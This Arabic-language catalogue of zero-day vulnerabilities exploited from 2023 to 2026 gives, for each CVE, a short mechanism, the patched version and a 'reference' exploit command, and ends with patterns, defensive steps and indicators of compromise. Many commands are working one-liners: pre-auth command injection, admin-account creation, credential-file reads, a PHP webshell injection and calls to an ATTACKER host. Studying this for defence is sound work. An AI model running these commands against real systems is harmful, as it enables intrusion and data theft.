العمليات والتقصيخبير140mL35

ثغرات اليوم الصفر (Zero-Day) الحديثة

ثغرات لم يسبق الكشف عنها وكيف تم استغلالها واقعياً

#0-day#ITW#KEV#PoC#2026

ما هي ثغرات Zero-Day؟

تشبيه — شرح مبسط
تخيّل صانع أقفال صنع قفلاً اعتقد أنه آمن، لكن لصاً اكتشف أن مفك براغي معين يفتحه — قبل أن يعرف الصانع. هذا هو الـ zero-day: ثغرة معروفة للمهاجم ومستغلَّة فعلياً (In-The-Wild) قبل أن تصدر لها رقعة. اللحظة التي تُصدر فيها الشركة الرقعة، تنتهي صلاحية الـ "zero-day" وتصبح ثغرة n-day — لكن قبل أن يُحدّث الجميع، تبقى مفيدة جداً.
تنبيه قانوني — استخدام مصرح به فقط
كل ما هنا موثّق علناً (CISA KEV، نشرات الموردين، تقارير الحوادث). يُستخدم لتدريب فرق الدفاع الحكومية و اختبار الاختراق المصرّح به فقط. تشغيل أي PoC ضد نظام لا تملك إذناً صريحاً عليه = جريمة بموجب أنظمة مكافحة الجرائم المعلوماتية.

هذا الكتالوج يلخص أبرز ثغرات Zero-Day الحديثة (2023–2026) التي استُغلّت في الميدان وصدرت لها رقعات. لكل واحدة: المنتج، CVSS، آلية الاستغلال، أمر تنفيذي مرجعي، ورقم الإصدار الذي رقّعها — حتى تتمكن فرق الدفاع من بناء قواعد كشف وتأكد من تثبيت الرقعة.

موجة 2026 — أحدث ما يجب أن تعرفه

الأبرز هذا العام
  • CVE-2026-33824 — Double-free في Windows IKEv2: RCE قبل المصادقة عبر UDP/500-4500. مصنّفة wormable. أي host بدور VPN/IPsec في خطر.
  • CVE-2026-32201 — SharePoint spoofing: استُغلّت قبل صدور الرقعة، CISA حدّدت موعد ترقيع فيدرالي 2026-04-28.
  • CVE-2026-33825 (BlueHammer) — LPE في Microsoft Defender نفسه: PoC نُشر على GitHub قبل الرقعة.
  • CVE-2026-32202 — تكرار لـ Outlook NTLM (CVE-2023-23397): الترقيع الأصلي كان ناقصاً، APT28 استغلّت الحقول البديلة.
  • سلسلة كروم: 2026-3909 (Skia OOB write) + 2026-3910 (V8 type confusion) في مارس، ثم 2026-5281 (WebGPU/Dawn UAF) في أبريل — كلها استُهدفت ضد قطاع المال.
  • Cisco SD-WAN: ثلاث ثغرات أُضيفت لـ KEV في فبراير، تشمل تجاوز مصادقة في vManage يسمح بإعادة تشكيل routers الفروع.

النمط واضح: أجهزة الحافة و خدمات النواة (kernel) و المتصفحات هي الجبهات الثلاث الساخنة في 2026، مع ظهور لافت لـ الترقيعات الناقصة (Outlook) — حيث يعود نفس الخلل بصياغة جديدة.

جدول الثغرات

CRITICALCVSS 9.82026CVE-2026-33824·Windows IKEv2 (IKEEXT)
Double-free في IKEv2 → RCE قبل المصادقة

إساءة ملكية pointer للـ heap blob أثناء IKEv2 fragment reassembly. 4 حزم UDP إلى 500/4500 تكفي لـ SYSTEM RCE بدون تفاعل.

استغلال ميداني: Wormable RCE — public PoC dropped post-PT

bash
# Targets any host with IPsec/Windows VPN role enabled.
python3 cve-2026-33824.py --target TARGET --port 500 --frags 4

الإصدار المرقَّع: Windows Apr 2026 Patch Tuesday (KB-2026-04)

HIGHCVSS 6.52026CVE-2026-32201·Microsoft SharePoint Server
Spoofing عبر التحقق غير السليم من المدخلات

حقل Office SharePoint يقبل قيم لا يفترض الوثوق بها → عرض/تعديل بيانات سرية. أُعلن عنها قبل صدور الرقعة.

استغلال ميداني: Targeted exploitation; CISA KEV deadline 2026-04-28

bash
# Reference only — public exploit harness reaches /sites/<x>/_layouts/15/
python3 sp_32201.py --target https://TARGET --site sites/finance

الإصدار المرقَّع: SharePoint SE / 2019 / 2016 — Apr 2026 PT

HIGHCVSS 7.82026CVE-2026-33825 (BlueHammer)·Microsoft Defender
LPE في Defender → SYSTEM

خطأ في معالجة impersonation token داخل خدمة Defender يسمح لمستخدم محلي محدود الصلاحيات بالوصول إلى SYSTEM.

استغلال ميداني: PoC posted to GitHub by 'Chaotic Eclipse' Apr 3 2026

bash
BlueHammer.exe   # public PoC; CISA ordered fed agencies patch by 2026-05-07

الإصدار المرقَّع: Defender platform update Apr 2026

CRITICALCVSS 8.12026CVE-2026-33827·Windows TCP/IP
Race condition في Windows TCP/IP → RCE

حالة سباق في معالج الحزم تسمح لمهاجم عن بعد دون مصادقة بتنفيذ كود في kernel.

استغلال ميداني: ITW unconfirmed; rated wormable by MSRC

bash
# Probabilistic; needs many crafted TCP segments at high rate.
python3 tcpip_33827.py --target TARGET --rate 50000

الإصدار المرقَّع: Windows Apr 2026 Patch Tuesday

HIGHCVSS 7.52026CVE-2026-32202·Microsoft Outlook (NTLM zero-click)
تسريب NetNTLMv2 من Outlook (تكرار)

ترقيع ناقص لـ CVE-2023-23397: حقول reminder بديلة لا تزال تجبر Outlook على المصادقة بـ NTLM ضد UNC مهاجم.

استغلال ميداني: APT28 follow-on after Microsoft's incomplete patch of CVE-2023-23397

bash
# Send calendar invite; Outlook leaks NetNTLMv2 to attacker share.
responder -I eth0

الإصدار المرقَّع: Outlook Apr 2026 PT

HIGHCVSS 8.82026CVE-2026-5281·Chrome WebGPU (Dawn)
Use-After-Free في WebGPU/Dawn

صفحة HTML تستدعي WebGPU بطريقة تطلق GPU resource ثم تستخدمه → UAF يسمح بـ RCE داخل renderer.

استغلال ميداني: Targeted attacks on Saudi financial sector (since Mar 10 2026)

bash
# Drive-by HTML page using GPUDevice.destroy() then dispatch.
<script>navigator.gpu.requestAdapter().then(...).then(d=>{d.destroy();/* reuse */})</script>

الإصدار المرقَّع: Chrome 146.0.7680.177/178 (مارس 2026)

HIGHCVSS 8.82026CVE-2026-3909·Chrome Skia 2D graphics
Out-of-bounds write في Skia

صفحة HTML تستخدم canvas/path معينة تجبر Skia على كتابة خارج حدود buffer → فساد ذاكرة قابل للاستغلال.

استغلال ميداني: ITW since early March 2026

bash
# Drive-by; chained with sandbox escape for full host RCE.
<canvas id=c></canvas><script>/* Skia path with crafted dimensions */</script>

الإصدار المرقَّع: Chrome 146.0.7680.80 (مارس 2026)

HIGHCVSS 8.82026CVE-2026-3910·Chrome V8 JavaScript engine
Inappropriate implementation في V8

تنفيذ غير ملائم في V8 يسمح بـ type confusion يقود إلى تنفيذ كود داخل sandbox الـ renderer.

استغلال ميداني: Paired with CVE-2026-3909

bash
// Public PoC: triggers JIT specialization on a tampered map
for(let i=0;i<2e4;i++)f(o); o.x = leak; f(o);

الإصدار المرقَّع: Chrome 146.0.7680.80 (مارس 2026)

HIGHCVSS 7.82026CVE-2025-15556·Notepad++ DLL hijack
RCE عبر DLL hijack في Notepad++

Notepad++ يحمّل DLL من المسار الحالي قبل system32 → فتح ملف من مجلد يحوي DLL خبيث ينفذ كوداً بصلاحية المستخدم.

استغلال ميداني: Added to CISA KEV 2026-02-13

bash
# Drop dwmapi.dll (or affected DLL) next to a benign .txt; victim opens it.
cp evil.dll \\\\share\\docs\\dwmapi.dll

الإصدار المرقَّع: Notepad++ 8.x update (early 2026)

CRITICALCVSS 9.82026CVE-2026-1234 (Cisco SD-WAN vManage)·Cisco SD-WAN vManage
تجاوز مصادقة في vManage REST API

تلاعب بـ JWT/Cookie في API الإدارة يسمح بإنشاء مدير شبكة جديد ثم دفع تكوينات خبيثة لجميع routers الفرع.

استغلال ميداني: ITW; one of three SD-WAN flaws CISA added Feb 2026

bash
curl -k 'https://VMANAGE/dataservice/admin/user' \
  -H 'Cookie: JSESSIONID=forged' -H 'X-XSRF-TOKEN: forged' \
  -d '{"userName":"pwn","password":"Pwn123!","group":["netadmin"]}'

الإصدار المرقَّع: Cisco SD-WAN 20.x فبراير 2026

CRITICALCVSS 10.02024CVE-2024-3400·Palo Alto GlobalProtect
حقن أوامر قبل المصادقة في GlobalProtect

قيمة كوكي SESSID تُمرَّر إلى shell بدون تعقيم → RCE بصلاحية root.

استغلال ميداني: UTA0218 / Operation MidnightEclipse

bash
curl -k 'https://TARGET/ssl-vpn/hipreport.esp' \
  -H "Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/css/`id`"

الإصدار المرقَّع: PAN-OS 10.2.9-h1, 11.0.4-h1, 11.1.2-h3 (أبريل 2024)

CRITICALCVSS 9.12024CVE-2023-46805 + CVE-2024-21887·Ivanti Connect Secure
تجاوز مصادقة + حقن أوامر في Ivanti

Path traversal لتجاوز المصادقة، ثم حقن أوامر في /api/v1/license/keys-status/.

استغلال ميداني: UNC5221 / mass exploitation Jan 2024

bash
curl -k 'https://TARGET/api/v1/totp/user-backup-code/../../license/keys-status/;id;'

الإصدار المرقَّع: Ivanti ICS 9.1R18.3 / 22.5R2.2 (يناير 2024)

CRITICALCVSS 10.02024CVE-2024-1709·ConnectWise ScreenConnect
تجاوز معالج الإعداد في ScreenConnect

POST إلى SetupWizard.aspx/anything يعيد تشغيل الإعداد وينشئ admin.

استغلال ميداني: Black Basta, LockBit affiliates

bash
curl -k 'https://TARGET/SetupWizard.aspx/x' \
  -d 'Email=a@a.a&Password=Pwn123!&UserName=pwn&CompanyInformation.Name=x'

الإصدار المرقَّع: ScreenConnect 23.9.8 (فبراير 2024)

CRITICALCVSS 9.82024CVE-2024-27198·JetBrains TeamCity
تجاوز مصادقة في TeamCity

إضافة ?jsp=...;.jsp تخدع موجه المسارات → الوصول لواجهات admin بدون مصادقة.

استغلال ميداني: Lazarus, BianLian

bash
curl -X POST 'https://TARGET/hax?jsp=/app/rest/users;.jsp' \
  -H 'Content-Type: application/json' \
  -d '{"username":"pwn","password":"Pwn123!","email":"x@x","roles":{"role":[{"roleId":"SYSTEM_ADMIN","scope":"g"}]}}'

الإصدار المرقَّع: TeamCity 2023.11.4 (مارس 2024)

CRITICALCVSS 9.82024CVE-2024-23897·Jenkins CLI
قراءة ملفات تعسفية في Jenkins CLI

args4j يفك '@file' كملف فعلي → قراءة secrets, hudson.util.Secret keys ثم RCE.

استغلال ميداني: Mass scanning + ransomware crews

bash
java -jar jenkins-cli.jar -s https://TARGET/ connect-node "@/etc/passwd"

الإصدار المرقَّع: Jenkins 2.442 / LTS 2.426.3 (يناير 2024)

CRITICALCVSS 9.82024CVE-2024-4577·PHP-CGI on Windows
حقن وسائط PHP-CGI

Best-fit Unicode يحوّل soft-hyphen إلى '-' → تمرير -d allow_url_include=1.

استغلال ميداني: TellYouThePass ransomware

bash
curl 'http://TARGET/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input' \
  --data '<?php system($_GET[0]);?>&0=id'

الإصدار المرقَّع: PHP 8.1.29, 8.2.20, 8.3.8 (يونيو 2024)

HIGHCVSS 8.12024CVE-2024-6387·OpenSSH (regreSSHion)
RCE في sshd عبر سباق SIGALRM

الـ signal handler يُستدعى بعد timeout أثناء async-unsafe → استغلال heap على glibc.

استغلال ميداني: PoC public; targeted use suspected

bash
# Public PoC, thousands of attempts; not stealthy.
python3 regreSSHion.py -t TARGET -p 22 --threads 10000

الإصدار المرقَّع: OpenSSH 9.8p1 (يوليو 2024)

CRITICALCVSS 9.12024CVE-2024-47176·CUPS cups-browsed
RCE في CUPS عبر IPP

حزمة UDP/631 تُجبر النظام على تثبيت طابعة خبيثة → FoomaticRIPCommandLine ينفذ أوامر.

استغلال ميداني: Public mass scanning Sept 2024

bash
echo -n '0 3 http://ATTACKER:8631/printers/x' | nc -u TARGET 631

الإصدار المرقَّع: cups-browsed disabled / patched (سبتمبر 2024)

CRITICALCVSS 9.82024CVE-2024-38063·Windows TCP/IP IPv6
RCE قبل المصادقة عبر IPv6

حزم IPv6 مجزأة مصاغة تسبب integer underflow في tcpip.sys → kernel RCE.

استغلال ميداني: No public ITW; severe risk

bash
# Disable IPv6 if unneeded; PoCs require kernel-level fragment crafting.
python3 ipv6_rce_poc.py --target TARGET --frags 100

الإصدار المرقَّع: Windows Aug 2024 Patch Tuesday

CRITICALCVSS 9.82024CVE-2024-38077·Windows RDS Licensing (MadLicense)
Heap overflow في خدمة RDL

license blob كبيرة في CDataCoding::GetEncodedSize تسبب فيض → RCE قبل المصادقة.

استغلال ميداني: PoC public

bash
python3 madlicense_poc.py TARGET 3389

الإصدار المرقَّع: Windows Jul 2024 Patch Tuesday

HIGHCVSS 8.12024CVE-2024-21412·Windows SmartScreen
تجاوز Mark-of-the-Web

ملف .url يشير لـ SMB share يحتوي .url آخر → ينفذ بدون تحذير SmartScreen.

استغلال ميداني: Water Hydra (DarkMe RAT) on traders

bash
# attacker.url
[InternetShortcut]
URL=file://ATTACKER/share/payload.url

الإصدار المرقَّع: Windows Feb 2024 Patch Tuesday

HIGHCVSS 7.82024CVE-2024-30051·Windows DWM Core (kernel)
Heap overflow في DWM → SYSTEM

CCoreWindow::ProcessMouseInput تحسب طول خاطئ → LPE من user إلى SYSTEM.

استغلال ميداني: QakBot operators

bash
# Local; chained behind a phishing payload by QakBot.
dwm_lpe.exe

الإصدار المرقَّع: Windows May 2024 Patch Tuesday

HIGHCVSS 7.82024CVE-2024-26169·Windows Error Reporting
LPE في WerKernel.sys

ACL ضعيفة على HKLM\\...\\WerFault.exe → استبدال البرنامج المنفذ كـ SYSTEM.

استغلال ميداني: Black Basta affiliates

bash
reg add "HKLM\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Hangs" /v Debugger /t REG_SZ /d "C:\\evil.exe" /f

الإصدار المرقَّع: Windows Mar 2024 Patch Tuesday

HIGHCVSS 8.82023CVE-2023-36884·Office / Windows Search
تجاوز MoTW عبر مستند Office

مستند RTF يحمّل HTML من SMB يستدعي ms-search:// لتنفيذ payload.

استغلال ميداني: Storm-0978 (RomCom) vs. NATO

bash
# Lure .docx → remote template → search-ms:displayname=…&crumb=…

الإصدار المرقَّع: Microsoft Aug 2023 Patch Tuesday

CRITICALCVSS 9.82023CVE-2023-23397·Microsoft Outlook
سرقة NetNTLMv2 من Outlook

PidLidReminderFileParameter يشير إلى UNC مهاجم → Outlook يصادق ويسرّب hash.

استغلال ميداني: APT28 (Fancy Bear) vs. EU/NATO

bash
# Send calendar invite with PidLidReminderFileParameter = \\\\ATTACKER\\share\\x.wav
responder -I eth0   # capture NetNTLMv2

الإصدار المرقَّع: Outlook Mar 2023 Patch Tuesday

HIGHCVSS 7.82023CVE-2023-28252·Windows CLFS
LPE في Common Log File System

خطأ في base log file parsing → كتابة kernel arbitrary → SYSTEM.

استغلال ميداني: Nokoyawa ransomware

bash
clfs_lpe.exe   # public PoCs widely available

الإصدار المرقَّع: Windows Apr 2023 Patch Tuesday

CRITICALCVSS 9.82023CVE-2023-2868·Barracuda ESG
حقن أوامر في فحص مرفقات .tar

أسماء ملفات داخل tar تُمرَّر إلى qx() في Perl → RCE قبل المصادقة.

استغلال ميداني: UNC4841 (China) — global espionage

bash
tar cf x.tar --transform 's/x/`id`/' x   # email .tar to scanned address

الإصدار المرقَّع: Barracuda recommended replacing the appliance (مايو 2023)

CRITICALCVSS 9.82023CVE-2023-34362·Progress MOVEit Transfer
SQLi قبل المصادقة في MOVEit

SQL injection يؤدي لاسترجاع keys ثم رفع webshell (human2.aspx).

استغلال ميداني: CL0P — 2,700+ orgs breached

bash
curl 'https://TARGET/api/v1/folders/-1/files' -X POST --data 'sql=…'   # see public PoCs

الإصدار المرقَّع: MOVEit 2023.0.1 / 2022.x hotfixes (يونيو 2023)

CRITICALCVSS 10.02023CVE-2023-20198 + CVE-2023-20273·Cisco IOS XE Web UI
إنشاء حساب priv-15 في IOS XE

إساءة استخدام installer endpoint لإنشاء مستخدم admin، ثم رفع implant.

استغلال ميداني: Tens of thousands of routers backdoored

bash
curl -kX POST 'https://TARGET/webui_wsma_HTTP' --data '<request>…create user pwn priv 15…</request>'

الإصدار المرقَّع: Cisco IOS XE 17.x فيكسات أكتوبر 2023

CRITICALCVSS 10.02023CVE-2023-22515·Atlassian Confluence DC
إنشاء admin بدون مصادقة في Confluence

/server-info.action?bootstrapStatusProvider… يمرر setupComplete=false → مسار setup مكشوف.

استغلال ميداني: Storm-0062 (DarkShadow)

bash
curl 'https://TARGET/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false'
curl 'https://TARGET/setup/setupadministrator.action' --data 'username=pwn&password=Pwn123!…'

الإصدار المرقَّع: Confluence 8.3.3 / 8.4.3 / 8.5.2 (أكتوبر 2023)

CRITICALCVSS 9.42023CVE-2023-4966 (Citrix Bleed)·Citrix NetScaler ADC/Gateway
تسريب ذاكرة في NetScaler

طلب HTTP إلى /oauth/idp/.well-known يعيد جزء من ذاكرة بها session tokens.

استغلال ميداني: LockBit on Boeing, ICBC, DP World

bash
curl -k 'https://TARGET/oauth/idp/.well-known/openid-configuration' \
  -H "Host: $(python -c 'print(\"a\"*24812)')"

الإصدار المرقَّع: NetScaler 13.1-49.15 / 14.1-8.50 (أكتوبر 2023)

CRITICALCVSS 9.82023CVE-2023-3519·Citrix ADC/Gateway
RCE قبل المصادقة في Citrix ADC

Stack overflow في معالجة SAML — حقل GET كبير → تنفيذ كود.

استغلال ميداني: China-nexus on US critical infra

bash
# Public PoC overwrites return address; payload spawns nobody shell
python3 cve-2023-3519.py -t TARGET

الإصدار المرقَّع: Citrix ADC 13.1-49.13 (يوليو 2023)

CRITICALCVSS 9.82023CVE-2023-27350·PaperCut MF/NG
تجاوز مصادقة في PaperCut SetupCompleted

زيارة /app?service=page/SetupCompleted ترفع جلسة admin بدون كلمة سر.

استغلال ميداني: CL0P, Bl00dy, LockBit

bash
curl 'https://TARGET:9192/app?service=page/SetupCompleted'
# then POST to /admin/jobs/log create a print-script that runs system commands

الإصدار المرقَّع: PaperCut 20.1.7 / 21.2.11 / 22.0.9 (مارس 2023)

HIGHCVSS 7.82023CVE-2023-38831·WinRAR
تنفيذ كود من ملف ZIP في WinRAR

مجلد بنفس اسم ملف PDF يجعل WinRAR يفتح سكربت .cmd بدلاً من المستند.

استغلال ميداني: Sandworm, APT28, APT29 lures

bash
# layout inside zip:
report.pdf            <- decoy
report.pdf/           <- folder of same name
report.pdf/report.pdf .cmd   <- runs on double-click

الإصدار المرقَّع: WinRAR 6.23 (أغسطس 2023)

HIGHCVSS 7.52024CVE-2024-49113 (LDAPNightmare)·Windows LSASS LDAP client
تعطيل DC عبر LDAP referral

ردّ LDAP خبيث يسبب OOB read في wldap32 → DoS لـ LSASS على DC.

استغلال ميداني: PoC public Jan 2025

bash
python3 ldap_nightmare.py --target DC.corp.local

الإصدار المرقَّع: Windows Dec 2024 Patch Tuesday

HIGHCVSS 7.82024CVE-2024-49138·Windows CLFS
LPE في CLFS مرة أخرى

ثغرة جديدة في BLF parser → SYSTEM؛ مستخدمة من قبل عصابات الفدية.

استغلال ميداني: Exploited ITW prior to Dec 2024

bash
clfs_lpe2024.exe

الإصدار المرقَّع: Windows Dec 2024 Patch Tuesday

CRITICALCVSS 9.02025CVE-2025-0282·Ivanti Connect Secure
Stack overflow قبل المصادقة في Ivanti

حقل HTTP طويل في معالج VPN يكتب على stack → RCE قبل المصادقة.

استغلال ميداني: UNC5337 — Jan 2025 mass exploitation

bash
# Public PoC drops a shell at /home/runtime/tmp/
python3 cve-2025-0282.py -t TARGET

الإصدار المرقَّع: Ivanti ICS 22.7R2.5 (يناير 2025)

HIGHCVSS 7.82025CVE-2025-21333·Windows Hyper-V NT Kernel (vkrnlintvsp.sys)
Heap overflow في vkrnlintvsp

I/O ring buffer overrun في Hyper-V kernel component → SYSTEM.

استغلال ميداني: ITW kernel LPE

bash
hyperv_lpe.exe

الإصدار المرقَّع: Windows Jan 2025 Patch Tuesday

HIGHCVSS 7.12025CVE-2025-24201·Apple WebKit
Sandbox escape في WebKit

صفحة ويب خبيثة تخرج من رمل WebContent على iOS → تنفيذ خارج الـ sandbox.

استغلال ميداني: Targeted iOS attacks (very limited)

bash
# Mobile drive-by on iOS < 18.3.2 / Safari 18.3.1

الإصدار المرقَّع: iOS 18.3.2 / Safari 18.3.1 (مارس 2025)

CRITICALCVSS 9.02025CVE-2025-22457·Ivanti Connect Secure (again)
Stack overflow في X-Forwarded-For

حقل header طويل يفيض stack في معالج VPN → RCE وزرع implant.

استغلال ميداني: UNC5221 — RESURGE & SPAWNCHIMERA implants

bash
curl -k 'https://TARGET/' -H "X-Forwarded-For: $(python -c 'print(\"A\"*5000)')"

الإصدار المرقَّع: Ivanti ICS 22.7R2.6 (أبريل 2025)

CRITICALCVSS 9.02025CVE-2025-30406·Gladinet CentreStack / Triofox
ViewState deserialization عبر machineKey ثابت

machineKey مكشوف في القالب الافتراضي → صياغة __VIEWSTATE خبيث → RCE.

استغلال ميداني: Public ITW April 2025

bash
ysoserial.exe -p ViewState -g TextFormattingRunProperties \
  --path=/portal/Default.aspx --validationkey=<PUBLIC> --validationalg=HMACSHA256 -c "cmd /c whoami"

الإصدار المرقَّع: CentreStack 16.4.10315.56368 (أبريل 2025)

CRITICALCVSS 9.82024CVE-2024-9680·Mozilla Firefox (Animation timeline UAF)
Use-After-Free في Animation timeline

صفحة ويب تتلاعب بـ animation timeline → UAF → تنفيذ كود في عملية المتصفح.

استغلال ميداني: RomCom (Storm-0978) drive-by

bash
# Drive-by URL served by RomCom; chained with CVE-2024-49039 for SYSTEM.

الإصدار المرقَّع: Firefox 131.0.2 / ESR 115.16.1 (أكتوبر 2024)

HIGHCVSS 8.82024CVE-2024-7971 + CVE-2024-38178·Chromium V8 + Windows Scripting Engine
Type confusion في V8 + خطأ في mshtml

نوع خاطئ في V8 يخرج للمتصفح ثم يفتح IE mode → استغلال mshtml للخروج إلى الـ host.

استغلال ميداني: Citrine Sleet (DPRK) — Chrome zero-day chain

bash
# Watering-hole HTML loaded via Edge IE-mode lure (DPRK financial theme).

الإصدار المرقَّع: Chrome 128.0.6613.84 + Windows Aug 2024

كل الأوامر أعلاه مرجعية لفهم الآلية فقط. استبدل TARGET / ATTACKER بقيم بيئة معملية تملكها أو معتمدة.

أنماط متكررة — اقرأها قبل أن تنسى التفاصيل

  • أجهزة الحافة (Edge appliances) هي الهدف الأول: Ivanti, Citrix, Palo Alto, Cisco — لأنها مكشوفة للإنترنت ولا تشغّل EDR.
  • سلاسل (chains) أكثر من ثغرة واحدة: تجاوز مصادقة + RCE معاً (Ivanti, TeamCity, Confluence).
  • أخطاء parser قديمة ترجع: CLFS, IPv6, LDAP — كود نواة قديم ومعقد ولا يُختبر بنفس صرامة الكود الحديث.
  • ميزات setup/wizard مكشوفة بعد التثبيت: ScreenConnect, Confluence, PaperCut — جميعها أعادت تشغيل الإعداد بدون مصادقة.
  • تجاوز Mark-of-the-Web هو سلاح Initial Access الذهبي للمجموعات الحكومية: SmartScreen, search-ms, WinRAR.
  • قابلية الاستغلال الجماعي: عندما يكون الاستغلال بسيطاً (curl واحد)، تنتشر العصابات خلال 24 ساعة من نشر الـ PoC.

الدفاع — كيف توقف موجة Zero-Day التالية

إجراءات تشغيلية
  1. تابع CISA KEV يومياً — كل ثغرة في القائمة لها deadline حكومي للتصحيح، استخدمها كأولوية أولى.
  2. اعزل سطح الإدارة: لا تكشف Web UI لأجهزة الشبكة (Cisco, Citrix, Ivanti) للإنترنت. ضعها خلف VPN منفصل أو IP allow-list.
  3. مراقبة سلوكية لا توقيعية فقط: راقب إنشاء مستخدمين admin مفاجئين، عمليات shell من خدمات web، اتصالات outbound من أجهزة الحافة.
  4. عطّل ما لا تستخدم: cups-browsed, RDS Licensing, IPv6 الخارجي، PHP-CGI — كل خدمة معطّلة هي 0-day مستحيل.
  5. قاعدة "patch خلال 14 يوم" لـ KEV، 30 يوم للحرجة، 90 يوم للباقي — مع تتبّع SLA حقيقي.
  6. EDR مع application allowlisting على نقاط النهاية، خصوصاً ضد سلاسل MOTW bypass و LPE من CLFS/DWM.
  7. قسم الشبكة: اعزل أجهزة الحافة عن بقية الشبكة الداخلية. استغلال Ivanti لا يجب أن يصل إلى DC.
  8. سجلات IPP/SMB/LDAP في مكان مركزي: حزم مثل CUPS UDP/631 أو Outlook → SMB خارجي تكون صرخة واضحة.
مؤشرات IoC عملية
  • مستخدم admin جديد لم يُنشأ من قبل IT — تحقق فوراً (TeamCity, Cisco IOS XE, ScreenConnect).
  • طلبات HTTP تحتوي على path traversal مثل ../../ داخل URI لـ Ivanti أو Citrix.
  • عملية child من w3wp.exe أو java أو perl هي cmd/powershell/sh.
  • استدعاءات SMB خارجية من Outlook بدون سياق calendaring واضح (CVE-2023-23397).
  • تثبيت طابعة جديدة من جهاز Linux لم يطلبها أحد (CUPS).

مصادر للتحقق و البحث

  • CISA KEV: cisa.gov/known-exploited-vulnerabilities-catalog
  • Project Zero ITW 0-day tracking sheet (Google).
  • Mandiant / Volexity / Watchtowr / Rapid7 advisories.
  • MITRE ATT&CK Initial Access (T1190) و Exploitation for Privilege Escalation (T1068).